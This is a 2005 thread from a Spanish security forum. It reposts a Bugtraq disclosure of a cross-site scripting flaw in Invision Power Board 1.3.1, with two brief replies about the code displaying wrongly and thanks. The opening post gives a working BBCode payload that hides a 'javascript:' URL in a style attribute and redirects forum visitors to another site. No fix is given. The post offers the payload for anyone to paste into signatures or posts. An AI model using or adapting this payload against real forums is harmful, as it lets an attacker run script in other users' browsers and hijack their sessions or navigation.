elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 13:27  


Tema destacado: Últimos eventos sobre seguridad/inseguridad

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Invision Power Board 1.3.1, XSS Exploit final :)		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Invision Power Board 1.3.1, XSS Exploit final :)  (Leído 1,134 veces)
Rojodos
Colaborador
***
Desconectado Desconectado

Mensajes: 3.535



Ver Perfil WWW
Invision Power Board 1.3.1, XSS Exploit final :)
« en: 18 Febrero 2005, 19:43 »
Recibido en Bugtraq (Hay que estar suscrito ostias :P)

******************************

Description:
Lack of checking in the SML codes.
Exploit:
Put this into any signature or post on an invision forum:
Código:
[COLOR=[img]http://aaa.aa/=`aaa.jpg[/img]]`style=background:url("javascript:document.location.replace('http://www.hackthissite.org');") [/color]
Fix:
I'm not good at regexes :)

******************************

Salu2
« Última modificación: 18 Febrero 2005, 20:04 por Rojodos » En línea
Blog: http://rafaelmbaez.blogspot.com
Twitter: http://twitter.com/rafaelmbaez
- xXx -


Desconectado Desconectado

Mensajes: 495


[::wormz::]


Ver Perfil WWW
Re: Invision Power Board 1.3.1, XSS Exploit final :)
« Respuesta #1 en: 18 Febrero 2005, 19:59 »
JEjeje Rojodos!!! que no se ve entero que se carga una imagen en medio del código!!! ahora no me dejes con la duda !! XDD :P weno a ver si lo puedes poner pliz

Por cierto aprovecho para darte la enhorabuena por el xploit que ya lo vi publicado por otros sitios ;) buen trabajo! (siempre anima que alguien te lo reconozca)
En línea
Rojodos
Colaborador
***
Desconectado Desconectado

Mensajes: 3.535



Ver Perfil WWW
Re: Invision Power Board 1.3.1, XSS Exploit final :)
« Respuesta #2 en: 18 Febrero 2005, 20:05 »
Ya esta arreglado  ;D

Y gracias  :)
En línea
Blog: http://rafaelmbaez.blogspot.com
Twitter: http://twitter.com/rafaelmbaez
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines